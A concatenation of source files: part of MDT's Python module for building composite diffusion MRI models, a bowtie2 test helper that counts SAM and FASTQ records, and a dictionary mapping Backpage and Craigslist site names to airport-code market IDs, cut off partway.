enforce_weights_sum_to_one (boolean): set to False to disable the automatic Weight-sum-to-one dependency.
By default it is True and we add them.
volume_selection (dict): the volume selection by this model. This can be used to limit the volumes used
in the analysis to only the volumes included in the specification. You can specify specific protocol
names here for limiting the selected volumes. For example, for the Tensor model we can write::
volume_selection = {'b': [(0, 1.5e9 + 0.1e9)]}
To limit the volumes to the b-values between 0 and 1.6e9.
If the method ``_get_suitable_volume_indices`` is overwritten, this does nothing.
prior (str or CLFunction or None): a model wide prior. This is used in conjunction
with the compartment priors and the parameter priors.
constraints (str or None): additional inequality constraints for this model. Each constraint needs to be
implemented as ``g(x)`` where we assume that ``g(x) <= 0``. For example, to implement a simple inequality
constraint like ``Tensor.d >= Tensor.dperp0``, we first write it as ``Tensor.dperp0 - Tensor.d <= 0``.
We can then implement it as::
constraints = 'constraints[0] = Tensor.dperp0 - Tensor.d;'
To add more constraint, add another entry to the ``constraints`` array. MDT parses the given text and
automatically recognizes the model parameter names and the number of constraints.
"""
_component_type = 'composite_models'
_builder = DMRICompositeModelBuilder()
name = ''
description = ''
extra_optimization_maps = []
extra_sampling_maps = []
model_expression = ''
likelihood_function = 'OffsetGaussian'
signal_noise_model = None
inits = {}
fixes = {}
upper_bounds = {}
lower_bounds = {}
enforce_weights_sum_to_one = True
volume_selection = None
prior = None
constraints = None
@classmethod
def meta_info(cls):
meta_info = deepcopy(ComponentTemplate.meta_info())
meta_info.update({'name': cls.name,
'description': cls.description})
return meta_info
def _resolve_likelihood_function(likelihood_function):
"""Resolve the likelihood function from a string if necessary.
The composite models accept likelihood functions as a string and as a object. This function
resolves the strings if a string is given, else it returns the object passed.
Args:
likelihood_function (str or object): the likelihood function to resolve to an object
Returns:
mdt.model_building.likelihood_models.LikelihoodFunction: the likelihood function to use
"""
if isinstance(likelihood_function, str):
return get_component('likelihood_functions', likelihood_function)()
else:
return likelihood_function
def _resolve_signal_noise_model(signal_noise_function):
"""Resolve the signal noise function from a string if necessary.
The composite models accept signal noise functions as a string and as a object. This function
resolves the strings if a string is given, else it returns the object passed.
Args:
signal_noise_function (str or object): the signal noise function to resolve to an object
Returns:
mdt.model_building.signal_noise_models.SignalNoiseModel: the signal noise function to use
"""
if isinstance(signal_noise_function, str):
return get_component('signal_noise_functions', signal_noise_function)()
else:
return signal_noise_function
def _resolve_model_prior(prior, model_parameters):
"""Resolve the model priors.
Args:
prior (None or str or mot.lib.cl_function.CLFunction): the prior defined in the composite model template.
model_parameters (str): the (model, parameter) tuple for all the parameters in the model
Returns:
list of mdt.model_building.utils.ModelPrior: list of model priors
"""
if prior is None:
return []
if isinstance(prior, CLFunction):
return [prior]
dotted_names = ['{}.{}'.format(m.name, p.name) for m, p in model_parameters]
dotted_names.sort(key=len, reverse=True)
parameters = []
remaining_prior = prior
for dotted_name in dotted_names:
bar_name = dotted_name.replace('.', '_')
if dotted_name in remaining_prior:
prior = prior.replace(dotted_name, bar_name)
remaining_prior = remaining_prior.replace(dotted_name, '')
parameters.append('mot_float_type ' + dotted_name)
elif bar_name in remaining_prior:
remaining_prior = remaining_prior.replace(bar_name, '')
parameters.append('mot_float_type ' + dotted_name)
return [SimpleCLFunction('mot_float_type', 'model_prior', parameters, prior)]
def _get_compartment_constraints(compartments):
"""Get a list of all the constraint functions defined in the compartments.
This function will add a wrapper around the constraint functions to make the inputs relative to the
compartment model. That it, the constraint functions of the compartments expect the parameter names without the
model name, whereas the expected input of the composite constraint functions is with the full model.map name.
Args:
compartments (list): the list of compartment models from which to get the constraints
Returns:
List[mot.optimize.base.ConstraintFunction]: list of constraint functions from the compartments.
"""
constraints = []
def get_wrapped_function(compartment_name, original_constraint_func):
parameters = []
for param in original_constraint_func.get_parameters():
if isinstance(param, FreeParameter):
parameters.append(param.get_renamed('{}_{}'.format(compartment_name, param.name)))
elif isinstance(param, ProtocolParameter):
parameters.append(param)
body = original_constraint_func.get_cl_function_name() + \
'(' + ', '.join(p.name for p in parameters) + ', constraints);'
return SimpleConstraintFunction(
'void', 'wrapped_' + original_constraint_func.get_cl_function_name(),
parameters + ['local mot_float_type* constraints'],
body,
dependencies=[original_constraint_func],
nmr_constraints=original_constraint_func.get_nmr_constraints())
for compartment in compartments:
if compartment.get_constraints_func():
constraints.append(get_wrapped_function(compartment.name, compartment.get_constraints_func()))
return constraints
def _resolve_constraints(constraint, model_parameters):
"""Resolve the constraints.
This parses the given constraints to recognize the parameters and the number of constraints.
Args:
constraint (str): the string with the constraints
model_parameters (tuple(str)): the (model, parameter) tuples for all parameters in the model
Returns:
mot.optimize.base.ConstraintFunction: the additional constraint function for this composite model
"""
if constraint is None:
return None
constraint_refs = re.findall(r'constraints\[(\d+)\]', constraint)
if not constraint_refs:
return None
nmr_constraints = max(map(int, constraint_refs)) + 1
parameters = []
protocol_parameters_seen = []
for m, p in model_parameters:
if isinstance(p, FreeParameter):
parameters.append(p.get_renamed('{}_{}'.format(m.name, p.name)))
elif isinstance(p, ProtocolParameter):
if p.name not in protocol_parameters_seen:
parameters.append(p)
protocol_parameters_seen.append(p.name)
dotted_names = ['{}.{}'.format(m.name, p.name) for m, p in model_parameters]
dotted_names.sort(key=len, reverse=True)
remaining_constraint = constraint
for dotted_name in dotted_names:
bar_name = dotted_name.replace('.', '_')
if dotted_name in remaining_constraint:
constraint = constraint.replace(dotted_name, bar_name)
remaining_constraint = remaining_constraint.replace(dotted_name, '')
elif bar_name in remaining_constraint:
remaining_constraint = remaining_constraint.replace(bar_name, '')
return SimpleConstraintFunction('void', 'model_constraints',
parameters + ['local mot_float_type* constraints'],
constraint, nmr_constraints=nmr_constraints)
def _get_model_extra_optimization_maps_funcs(compartments):
"""Get a list of all the additional result functions defined in the compartments.
This function will add a wrapper around the modification routines to make the input and output maps relative to the
model. That it, the functions in the compartments expect the parameter names without the model name and they output
maps without the model name, whereas the expected input and output of the functions of the model is with the
full model.map name.
Args:
compartments (list): the list of compartment models from which to get the extra optimization maps
Returns:
list: the list of modification routines taken from the compartment models.
"""
funcs = []
def get_wrapped_func(compartment_name, original_func):
def get_compartment_specific_results(results):
maps = {k[len(compartment_name) + 1:]: v for k, v in results.items() if k.startswith(compartment_name)}
if 'covariances' in results and results['covariances'] is not None:
p = re.compile(compartment_name + r'\.\w+_to_' + compartment_name + r'\.\w+')
maps['covariances'] = {k.replace(compartment_name + '.', ''): v
for k, v in results['covariances'].items() if p.match(k)}
return results.copy_with_different_results(maps)
def prepend_compartment_name(results):
return {'{}.{}'.format(compartment_name, key): value for key, value in results.items()}
def wrapped_modifier(results):
return prepend_compartment_name(original_func(get_compartment_specific_results(results)))
return wrapped_modifier
for compartment in compartments:
for func in compartment.get_extra_optimization_maps_funcs():
funcs.append(get_wrapped_func(compartment.name, func))
return funcs
def _get_model_extra_sampling_maps_funcs(compartments):
"""Get a list of all the additional post-sample functions defined in the compartments.
This function will add a wrapper around the modification routines to make the input and output maps relative to the
model. That it, the functions in the compartments expect the parameter names without the model name and they output
maps without the model name, whereas the expected input and output of the functions of the model is with the
full model.map name.
Args:
compartments (list): the list of compartment models from which to get the extra sampling maps
Returns:
list: the list of extra sample routines taken from the compartment models.
"""
funcs = []
def get_wrapped_func(compartment_name, original_func):
def prepend_compartment_name(results):
return {'{}.{}'.format(compartment_name, key): value for key, value in results.items()}
def wrapped_modifier(results):
return prepend_compartment_name(original_func(CompartmentContextResults(compartment_name, results)))
return wrapped_modifier
for compartment in compartments:
for func in compartment.get_extra_sampling_maps_funcs():
funcs.append(get_wrapped_func(compartment.name, func))
return funcs
class CompartmentContextResults(collections.Mapping):
def __init__(self, compartment_name, input_results):
"""Translates the original results to the context of a single compartment.
This basically adds a wrapper around the input dictionary to make the keys relative to the compartment.
Args:
compartment_name (str): the name of the compartment we are making things relative for
input_results (dict): the original input we want to make relative
"""
self._compartment_name = compartment_name
self._input_results = input_results
self._valid_keys = [key for key in self._input_results if key.startswith(self._compartment_name + '.')]
def __getitem__(self, key):
return self._input_results['{}.{}'.format(self._compartment_name, key)]
def __len__(self):
return len(self._valid_keys)
def __iter__(self):
return self._valid_keys
def parse_composite_model_expression(model_expression):
"""Parse the given model expression into a suitable model tree.
Args:
model_expression (str): the model expression string. Example::
model_expression = '''
S0 * ( (Weight(Wball) * Ball) +
(Weight(Wstick) * Stick ) )
'''
If the model name is followed by parenthesis the string in parenthesis will represent the model's nickname.
Returns:
:class:`list`: the compartment model tree for use in composite models.
"""
class Semantics:
def expr(self, ast):
if not isinstance(ast, (list,tuple)):
return ast
if isinstance(ast, (list,tuple)):
return ast[0], ast[2], ast[1]
return ast
def term(self, ast):
if not isinstance(ast, (list,tuple)):
return ast
if isinstance(ast, list):
return ast[0], ast[2], ast[1]
return ast
def factor(self, ast):
if isinstance(ast, (list,tuple)):
return ast[1]
return ast
def model(self, ast):
if isinstance(ast, str):
return get_component('compartment_models', ast)()
else:
return get_component('compartment_models', ast[0])(ast[2])
return _composite_model_expression_parser.parse(model_expression, semantics=Semantics())
| cbclab/MDT | mdt/component_templates/composite_models.py | Python | lgpl-3.0 | 21,871 | [
"Gaussian"
] | 513f0e7babcfaea9739fb6ecb7532476bbcec981a58fcd916a53cd22eae970f9 |
#!/usr/bin/env python
import os
import logging
class DataFace(object):
""" Some data IFace bowtie can work with.
"""
def size(self):
raise NotImplementedError("size() needs to be implemented!")
class SamFile(DataFace):
def __init__(self,sam_desc):
self.file_desc = sam_desc
def size(self):
if hasattr(self,'no_frags'):
return self.no_frags
count = 0
try:
fh = open(self.file_desc,"r")
for line in fh:
if line[0] != "@":
count += 1
except:
logging.error("Exception reading sam file!")
fh.close()
raise
else:
fh.close()
self.no_frags = count
return count
class FastaQFile(DataFace):
def __init__(self,fastq_desc):
self.file_desc = fastq_desc
def size(self):
if hasattr(self,'no_seqs'):
return self.no_seqs
count = 0
try:
fh = open(self.file_desc,"r")
lno = 0
for line in fh:
if lno == 0:
if line[0] != '@':
raise TypeError("This does not look like a fastq file!")
count += 1
if lno == 2:
if line[0] != '+':
raise TypeError("This does not look like a fastq file!")
lno = (lno + 1) % 4
except:
logging.error("Exception reading fastq file!")
fh.close()
raise
else:
fh.close()
self.no_seqs = count
return self.no_seqs
| iml/bowtie2 | scripts/test/dataface.py | Python | gpl-3.0 | 1,769 | [
"Bowtie"
] | 31ee5da6abe27dd437fded11357a9a3b1a19e0f9a84d31e008f2712b93256c69 |
#!/usr/bin/python
# backpage_sitekey_to_marketid
backpage_sitekey_to_marketid = {
"abbotsford": "YXX",
"aberdeen": "ABZ",
"abilene": "ABI",
"acapulco": "ACA",
"adelaide": "ADL",
"ahmedabad": "AMD",
"akroncanton": "CAK",
"alabama": "BHM",
"albany": "ALB",
"albanyga": "ABY",
"alberta": "YEG",
"albuquerque": "ABQ",
"alexandria": "ESF",
"alicante": "ALC",
"allentown": "ABE",
"altoona": "AOO",
"amarillo": "AMA",
"amsterdam": "AMS",
"anchorage": "ANC",
"annapolis": "ANP",
"annarbor": "ARB",
"appleton": "ATW",
"arizona": "PHX",
"arkansas": "LIT",
"arlington": "DFW",
"asheville": "AVL",
"ashtabula": "HZY",
"athensga": "AHN",
"athensoh": "ATO",
"athina": "ATH",
"atlanta": "ATL",
"auburn": "AUO",
"auckland": "AKL",
"augusta": "AGS",
"austin": "AUS",
"bahamas": "NAS",
"bahia": "SSA",
"bajasur": "SJD",
"bakersfield": "BFL",
"baleares": "PMI",
"balgariya": "SOF",
"baltimore": "BWI",
"bangalore": "BLR",
"bangladesh": "DAC",
"barcelona": "BCN",
"barrie": "QEB",
"basel": "BSL",
"batonrouge": "BTR",
"battlecreek": "AZO",
"beaumont": "BPT",
"beijing": "PEK",
"belfast": "BFS",
"belleville": "YTR",
"bellingham": "BLI",
"belohorizonte": "CNF",
"bemidji": "BJI",
"bend": "RDM",
"berlin": "TXL",
"bern": "BRN",
"bhubaneswar": "BBI",
"bigisland": "KOA",
"bilbao": "BIO",
"biloxi": "GPT",
"binghamton": "BGM",
"birmingham": "BHM",
"birminghamuk": "BHX",
"bismarck": "BIS",
"blacksburg": "BCB",
"bloomington": "BMI",
"bloomingtonin": "BMG",
"boise": "BOI",
"bologna": "BLQ",
"boone": "NC06",
"bordeaux": "BOD",
"boston": "BOS",
"boulder": "WBU",
"bowlinggreen": "BWG",
"brantford": "YFD",
"brasilia": "BSB",
"bremen": "BRE",
"bretagne": "RNS",
"brighton": "ESH",
"brisbane": "BNE",
"bristol": "BRS",
"britishcolumbia": "YVR",
"bronx": "JFK",
"brooklyn": "JFK",
"brownsville": "BRO",
"brunswick": "BQK",
"brussel": "BRU",
"bucuresti": "OTP",
"budapest": "BUD",
"buenosaires": "EZE",
"buffalo": "BUF",
"burlington": "BTV",
"cadiz": "XRY",
"calabria": "REG",
"calgary": "YYC",
"cambridge": "CBG",
"canarias": "TFS",
"canberra": "CBR",
"capecod": "PVC",
"capetown": "CPT",
"caracas": "CCS",
"carbondale": "MDH",
"caribbean": "KIN",
"cariboo": "YXS",
"catskills": "20N",
"cedarrapids": "CID",
"centraljersey": "47N",
"centralmich": "LAN",
"chambana": "CMI",
"chambersburg": "N68",
"chandigarh": "IXC",
"charleston": "CHS",
"charlestonwv": "CRW",
"charlotte": "CLT",
"charlottesville": "CHO",
"chatham": "XCM",
"chattanooga": "CHA",
"chautauqua": "JHW",
"chengdu": "CTU",
"chennai": "MAA",
"chesapeake": "ORF",
"chicago": "ORD",
"chico": "CIC",
"chihuahua": "CUU",
"chillicothe": "RZT",
"chongqing": "CKG",
"christchurch": "CHC",
"cincinnati": "CVG",
"clarksville": "CKV",
"cleveland": "CLE",
"clovis": "CVN",
"collegestation": "CLL",
"colombia": "BOG",
"colorado": "DEN",
"coloradosprings": "COS",
"columbia": "CAE",
"columbiamo": "COU",
"columbus": "CMH",
"columbusga": "CSG",
"comoxvalley": "YQQ",
"connecticut": "HFD",
"cookeville": "SRB",
"cork": "ORK",
"cornwall": "YCC",
"corpuschristi": "CRP",
"corse": "AJA",
"corvallis": "CVO",
"costarica": "SJO",
"cranbrook": "YXC",
"cumberlandvalley": "CBE",
"curitiba": "CWB",
"dalian": "DLC",
"dallas": "DFW",
"danville": "DAN",
"darwin": "DRW",
"dayton": "DAY",
"daytona": "DAB",
"dc": "IAD",
"decatur": "DEC",
"delaware": "ILG",
"delhi": "DEL",
"delrio": "DRT",
"denhaag": "RTM",
"denton": "DFW",
"denver": "DEN",
"derry": "LDY",
"desmoines": "DSM",
"detroit": "DTW",
"devon": "EXT",
"dom-tom": "PTP",
"dominican": "SDQ",
"dothan": "DHN",
"dresden": "DRS",
"dubai": "DXB",
"dublin": "DUB",
"dubuque": "DBQ",
"duesseldorf": "DUS",
"duluth": "DLH",
"dunedin": "DUD",
"durban": "DUR",
"eastanglia": "NWI",
"eastbay": "OAK",
"easternnc": "PGV",
"easternshore": "SBY",
"eastidaho": "IDA",
"eastky": "PBX",
"eastmidlands": "EMA",
"eastoregon": "PDT",
"eauclaire": "EAU",
"edinburgh": "EDI",
"edmonton": "YEG",
"eindhoven": "EIN",
"elko": "EKO",
"elmira": "ELM",
"elpaso": "ELP",
"elsalvador": "SAL",
"erie": "ERI",
"essen": "ESS",
"eugene": "EUG",
"evansville": "EVV",
"everett": "PAE",
"fairfield": "BDR",
"fargo": "FAR",
"farmington": "FMN",
"faro-algarve": "FAO",
"fayetteville": "XNA",
"fayettevillenc": "FAY",
"fingerlakes": "D82",
"firenze": "FLR",
"flagstaff": "FLG",
"flint": "FNT",
"florence": "FLO",
"forli-cesena": "FRL",
"fortaleza": "FOR",
"fortcollins": "FNL",
"fortdodge": "FOD",
"fortmyers": "RSW",
"fortsmith": "FSM",
"fortwayne": "FWA",
"fortworth": "DFW",
"frankfurt": "FRA",
"frederick": "FDK",
"fredericksburg": "EZF",
"fresno": "FAT",
"ftlauderdale": "FLL",
"ftmcmurray": "YMM",
"fukuoka": "FUK",
"gadsden": "GAD",
"gainesville": "GNV",
"galveston": "GLS",
"genf": "GVA",
"genova": "GOA",
"georgia": "ATL",
"glasgow": "GLA",
"glensfalls": "GFL",
"goa": "GOI",
"granada": "GRX",
"grandforks": "GFK",
"grandisland": "GRI",
"grandrapids": "GRR",
"greenbay": "GRB",
"greensboro": "GSO",
"greenville": "GSP",
"grenoble": "GNB",
"guadalajara": "GDL",
"guam": "GUM",
"guanajuato": "BJX",
"guangzhou": "CAN",
"guatemala": "GUA",
"guelph": "CNC4",
"haifa": "HFA",
"halifax": "YHZ",
"hamburg": "HAM",
"hamilton": "YHM",
"hampshire": "SOU",
"hampton": "ORF",
"hangzhou": "HGH",
"hannover": "HAJ",
"harrisburg": "MDT",
"harrisonburg": "SHD",
"hartford": "HFD",
"hattiesburg": "HBG",
"hawaii": "HNL",
"heidelberg": "HDB",
"helsinki": "HEL",
"hermosillo": "HMO",
"hickory": "HKY",
"hiltonhead": "HHH",
"hiroshima": "HIJ",
"hobart": "HBA",
"holland": "BIV",
"hongkong": "HKG",
"honolulu": "HNL",
"houma": "HUM",
"houston": "IAH",
"hudsonvalley": "SWF",
"humboldt": "ACV",
"huntington": "HTS",
"huntingtonoh": "HTS",
"huntsville": "HSV",
"huntsvilletx": "UTS",
"hyderabad": "HYD",
"iceland": "RKV",
"idaho": "BOI",
"illinois": "ORD",
"imperial": "IPL",
"indiana": "IND",
"indianapolis": "IND",
"indore": "IDR",
"inlandempire": "ONT",
"iowa": "DSM",
"iowacity": "IOW",
"istanbul": "IST",
"ithaca": "ITH",
"jackson": "JAN",
"jacksonmi": "JXN",
"jacksonville": "OAJ",
"jaipur": "JAI",
"jakarta": "CGK",
"jamaica": "KIN",
"janesville": "JVL",
"jerseyshore": "ACY",
"jerusalem": "JRS",
"johannesburg": "JNB",
"jonesboro": "JBR",
"joplin": "JLN",
"juarez": "XRY",
"kaiserslautern": "RMS",
"kalamazoo": "AZO",
"kamloops": "YKA",
"kansas": "FOE",
"karlsruhe": "FKB",
"kauai": "LIH",
"kc": "MCI",
"kelowna": "YLW",
"kentucky": "SDF",
"kerala": "TRV",
"keys": "EYW",
"kiel": "KEL",
"killeen": "GRK",
"kingston": "YGK",
"kirksville": "IRK",
"kitchener": "YKF",
"klamath": "LMT",
"knoxville": "TYS",
"kobenhavn": "CPH",
"koeln": "CGN",
"kokomo": "OKK",
"kolkata": "CCU",
"lacrosse": "LSE",
"lafayette": "LFT",
"lakecharles": "LCH",
"lakeland": "LAL",
"lancaster": "LNS",
"lansing": "LAN",
"lapaz": "LPB",
"laredo": "LRD",
"lasalle": "VYS",
"lascruces": "LRU",
"lasvegas": "LAS",
"lausanne": "QLS",
"lawrence": "LWC",
"lawton": "LAW",
"leeds": "LBA",
"leipzig": "LEJ",
"lethbridge": "YQL",
"lewiston": "LWS",
"lexington": "LEX",
"lille": "LIL",
"lima": "LIM",
"limaoh": "AOH",
"limerick": "SNN",
"lincoln": "LNK",
"lisboa": "LIS",
"lisburn": "BFS",
"littlerock": "LIT",
"liverpool": "LPL",
"logan": "LGU",
"loire": "NTE",
"london": "LHR",
"londonon": "YXU",
"longbeach": "LGB",
"longisland": "ISP",
"losangeles": "LAX",
"louisiana": "MSY",
"louisville": "SDF",
"loz": "AIZ",
"lubbock": "LBB",
"lucknow": "LKO",
"luebeck": "LBC",
"luxembourg": "LUX",
"lynchburg": "LYH",
"lyon": "LYS",
"macon": "MCN",
"madison": "MSN",
"madrid": "MAD",
"maine": "PWM",
"malaga": "AGP",
"malaysia": "KUL",
"malta": "MLA",
"managua": "MGA",
"manchester": "MAN",
"manhattan": "JFK",
"manhattanks": "MHK",
"mankato": "MKT",
"mannheim": "MHG",
"mansfield": "MFD",
"marseille": "MRS",
"martinsburg": "MRB",
"maryland": "BWI",
"masoncity": "MCW",
"massachusetts": "BOS",
"mattoon": "MTO",
"maui": "OGG",
"mazatlan": "MZT",
"mcallen": "MFE",
"meadville": "GKJ",
"medford": "MFR",
"medicinehat": "YXH",
"melbourne": "MEL",
"memphis": "MEM",
"mendocino": "UKI",
"merced": "MCE",
"meridian": "MEI",
"mexicocity": "MEX",
"miami": "MIA",
"michigan": "DTW",
"milano": "MXP",
"milwaukee": "MKE",
"minneapolis": "MSP",
"minnesota": "MSP",
"minot": "MOT",
"mississippi": "JAN",
"missouri": "STL",
"mobile": "MOB",
"modesto": "MOD",
"mohave": "IGM",
"monroe": "MLU",
"monroemi": "TTF",
"montana": "HLN",
"monterey": "MRY",
"monterrey": "MTY",
"montevideo": "MVD",
"montgomery": "MGM",
"montpellier": "MPL",
"montreal": "YUL",
"morgantown": "MGW",
"morocco": "CMN",
"moseslake": "MWH",
"moskva": "SVO",
"mtvernon": "BVS",
"muenchen": "MUC",
"mumbai": "BOM",
"muncie": "MIE",
"muskegon": "MKG",
"myrtlebeach": "MYR",
"nagoya": "NGO",
"nanaimo": "YCD",
"nanjing": "NKG",
"napoli": "NAP",
"nashville": "BNA",
"natchez": "HEZ",
"nebraska": "OMA",
"nevada": "LAS",
"newbrunswick": "YQM",
"newcastle": "NCL",
"newhampshire": "MHT",
"newhaven": "HVN",
"newjersey": "EWR",
"newlondon": "GON",
"newmexico": "ABQ",
"neworleans": "MSY",
"newportnews": "ORF",
"newyork": "JFK",
"niagara": "YCM",
"nice": "NCE",
"nigeria": "LOS",
"norfolk": "ORF",
"normandie": "URO",
"northbay": "STS",
"northcarolina": "CLT",
"northdakota": "FAR",
"northernmichigan": "TVC",
"northjersey": "EWR",
"northmiss": "TUP",
"northplatte": "LBF",
"nova": "IAD",
"nuernberg": "NUE",
"nwct": "DXR",
"nwga": "RMG",
"oaxaca": "OAX",
"ocala": "OCF",
"odessa": "MAF",
"ogden": "OGD",
"ohio": "CMH",
"okinawa": "OKA",
"oklahoma": "OKC",
"oklahomacity": "OKC",
"olympia": "TCM",
"omaha": "OMA",
"oneonta": "ONH",
"ontario": "YOW",
"orangecounty": "SNA",
"oregon": "PDX",
"oregoncoast": "ONP",
"orlando": "MCO",
"osaka-kobe-kyoto": "KIX",
"oslo": "OSL",
"ottawa": "YOW",
"ottumwa": "OTM",
"outerbanks": "FFA",
"owensboro": "OWB",
"owensound": "YOS",
"oxford": "OXF",
"pakistan": "KHI",
"palma": "PMI",
"palmdale": "PMD",
"palmsprings": "PSP",
"panama": "PAC",
"panamacity": "PFN",
"paris": "CDG",
"parkersburg": "PKB",
"peace": "YPE",
"pennstate": "UNV",
"pennsylvania": "PHL",
"pensacola": "PNS",
"peoria": "PIA",
"perth": "PER",
"perugia": "PEG",
"peterborough": "YPQ",
"philadelphia": "PHL",
"phoenix": "PHX",
"pittsburgh": "PIT",
"plattsburgh": "PBG",
"poconos": "MPO",
"porthuron": "PHN",
"portland": "PDX",
"porto": "OPO",
"portoalegre": "POA",
"portsmouth": "ORF",
"potsdam": "PTD",
"praha": "PRG",
"prescott": "PRC",
"pretoria": "PRY",
"princegeorge": "YXS",
"providence": "PVD",
"provo": "PVU",
"puebla": "PBC",
"pueblo": "PUB",
"puertorico": "SJU",
"pullman": "PUW",
"pune": "PNQ",
"pv": "PVR",
"quadcities": "MLI",
"quebec": "YUL",
"quebeccity": "YQB",
"queens": "JFK",
"quincy": "UIN",
"quito": "UIO",
"racine": "RAC",
"raleigh": "RDU",
"reading": "RDG",
"recife": "REC",
"reddeer": "YQF",
"redding": "RDD",
"regina": "YQR",
"reno": "RNO",
"richmond": "RIC",
"richmondin": "RID",
"riodejaneiro": "GIG",
"roanoke": "ROA",
"rochester": "ROC",
"rochestermn": "RST",
"rockford": "RFD",
"rockies": "EGE",
"roma": "FCO",
"roseburg": "RBG",
"rostock": "RLG",
"roswell": "ROW",
"rotterdam": "RTM",
"sacramento": "SMF",
"saginaw": "MBS",
"saguenay": "YBG",
"salem": "SLE",
"saltlakecity": "SLC",
"salvador": "SSA",
"sanantonio": "SAT",
"sandiego": "SAN",
"sandusky": "SKY",
"sanfernandovalley": "BUR",
"sangabrielvalley": "EMT",
"sanjose": "SJC",
"sankt-peterburg": "LED",
"sanluisobispo": "SBP",
"sanmarcos": "HYI",
"sanmateo": "SQL",
"santabarbara": "SBA",
"santacruz": "WVI",
"santafe": "SAF",
"santamaria": "SMX",
"santiago": "SCL",
"saopaulo": "GRU",
"sapporo": "CTS",
"sarasota": "SRQ",
"sardegna": "CAG",
"sarnia": "YZR",
"saskatchewan": "YQR",
"saskatoon": "YXE",
"sault": "YAM",
"savannah": "SAV",
"schwerin": "SZW",
"scottsbluff": "BFF",
"scranton": "AVP",
"seattle": "SEA",
"semo": "CGI",
"sendai": "SDJ",
"seoul": "ICN",
"sevilla": "SVQ",
"sf": "SFO",
"shanghai": "SHA",
"sheboygan": "SBM",
"sheffield": "DSA",
"shenyang": "SHE",
"shenzhen": "SZX",
"sherbrooke": "YSC",
"shoals": "MSL",
"showlow": "SOW",
"shreveport": "SHV",
"sicilia": "PMO",
"sierravista": "FHU",
"singapore": "SIN",
"siouxcity": "SUX",
"siskiyou": "SIY",
"skeena": "XCM",
"southbend": "SBN",
"southcarolina": "CAE",
"southcoast": "EWB",
"southdakota": "PIR",
"southernmaryland": "2W6",
"southernwestvirginia": "BKW",
"southjersey": "MIV",
"spacecoast": "TIX",
"spokane": "GEG",
"springfield": "CEF",
"springfieldil": "SPI",
"springfieldmo": "SGF",
"statenisland": "JFK",
"statesboro": "TBR",
"staugustine": "UST",
"stcloud": "STC",
"stgeorge": "SGU",
"stillwater": "SWO",
"stjohns": "YYT",
"stjoseph": "STJ",
"stlouis": "STL",
"stockholm": "ARN",
"stockton": "SCK",
"strasbourg": "SXB",
"stuttgart": "STR",
"sudbury": "YSB",
"suffolk": "ORF",
"sunshine": "YHS",
"surat": "STV",
"susanville": "SVE",
"swmi": "BEH",
"swva": "MKJ",
"sydney": "SYD",
"syracuse": "SYR",
"tacoma": "TCM",
"taipei": "TPE",
"tallahassee": "TLH",
"tampa": "TPA",
"telaviv": "TLV",
"tennessee": "BNA",
"terrehaute": "HUF",
"texarkana": "TXK",
"texoma": "GYI",
"thunderbay": "YQT",
"tijuana": "TIJ",
"tippecanoe": "LAF",
"tokyo": "NRT",
"toledo": "TOL",
"topeka": "FOE",
"torino": "TRN",
"toronto": "YYZ",
"toulouse": "TLS",
"treasurecoast": "VRB",
"tricities": "TRI",
"tricitieswa": "PSC",
"troisrivieres": "YRQ",
"tucson": "TUS",
"tulsa": "TUL",
"tuscaloosa": "TCL",
"tuscarawas": "PHD",
"twinfalls": "TWF",
"twintiers": "OLE",
"tyler": "TYR",
"ukraine": "IEV",
"up": "MQT",
"utah": "SLC",
"utica": "UCA",
"utrecht": "AMS",
"valdosta": "VLD",
"valencia": "VLC",
"vancouver": "YVR",
"venezia": "VCE",
"ventura": "OXR",
"veracruz": "VER",
"victoria": "YYJ",
"victoriatx": "VCT",
"virginia": "RIC",
"virginiabeach": "ORF",
"virginislands": "STT",
"visalia": "VIS",
"waco": "ACT",
"wales": "CWL",
"warszawa": "WAW",
"washington": "SEA",
"washingtondc": "IAD",
"waterford": "WAT",
"waterloo": "YKF",
"watertown": "ART",
"wausau": "AUW",
"wellington": "WLG",
"wenatchee": "EAT",
"westbank": "JRS",
"westchester": "HPN",
"westernmaryland": "CBE",
"westky": "PAH",
"westpalmbeach": "PBI",
"westslope": "GJT",
"westvirginia": "CRW",
"wheeling": "HLG",
"whistler": "YWS",
"whitehorse": "YXY",
"wichita": "ICT",
"wichitafalls": "SPS",
"wien": "VIE",
"williamsport": "IPT",
"wilmington": "ILM",
"windsor": "YQG",
"winnipeg": "YWG",
"winstonsalem": "INT",
"wisconsin": "MKE",
"worcester": "ORH",
"wuhan": "WUH",
"wyoming": "CPR",
"xian": "XIY",
"yakima": "YKM",
"yellowknife": "YZF",
"york": "THV",
"youngstown": "YNG",
"yucatan": "MID",
"yuma": "YUM",
"zanesville": "ZZV",
"zurich": "ZRH"}
# craigslist_sitekey_to_marketid
craigslist_sitekey_to_marketid = {
"abbotsford": "YXX",
"aberdeen": "ABZ",
"abilene": "ABI",
"acapulco": "ACA",
"accra": "ACC",
"addisababa": "ADD",
"adelaide": "ADL",
"ahmedabad": "AMD",
"akroncanton": "CAK",
"albany": "ALB",
"albanyga": "ABY",
"albuquerque": "ABQ",
"alicante": "ALC",
"allentown": "ABE",
"altoona": "AOO",
"amarillo": "AMA",
"ames": "AMW",
"amsterdam": "AMS",
"anchorage": "ANC",
"annapolis": "ANP",
"annarbor": "ARB",
"appleton": "ATW",
"asheville": "AVL",
"ashtabula": "HZY",
"athens": "ATH",
"athensga": "AHN",
"athensohio": "ATO",
"atlanta": "ATL",
"auburn": "AUO",
"auckland": "AKL",
"augusta": "AGS",
"austin": "AUS",
"bacolod": "BCD",
"baghdad": "BGW",
"bajasur": "SJD",
"bakersfield": "BFL",
"baleares": "PMI",
"baltimore": "BWI",
"bangalore": "BLR",
"bangkok": "BKK",
"bangladesh": "DAC",
"barcelona": "BCN",
"barrie": "QEB",
"basel": "BSL",
"bath": "BRS",
"batonrouge": "BTR",
"battlecreek": "AZO",
"beaumont": "BPT",
"beijing": "PEK",
"beirut": "BEY",
"belfast": "BFS",
"belleville": "YTR",
"bellingham": "BLI",
"belohorizonte": "CNF",
"bemidji": "BJI",
"bend": "",
"berlin": "TXL",
"bern": "BRN",
"bgky": "BWG",
"bham": "BHM",
"bhubaneswar": "BBI",
"bigbend": "ALE",
"bilbao": "BIO",
"billings": "BIL",
"binghamton": "BGM",
"birmingham": "BHX",
"bismarck": "BIS",
"blacksburg": "BCB",
"bloomington": "BMG",
"bn": "BMI",
"boise": "BOI",
"bologna": "BLQ",
"boone": "NC06",
"bordeaux": "BOD",
"boston": "BOS",
"boulder": "WBU",
"bozeman": "BZN",
"brainerd": "BRD",
"brantford": "YFD",
"brasilia": "BSB",
"bremen": "BRE",
"brighton": "ESH",
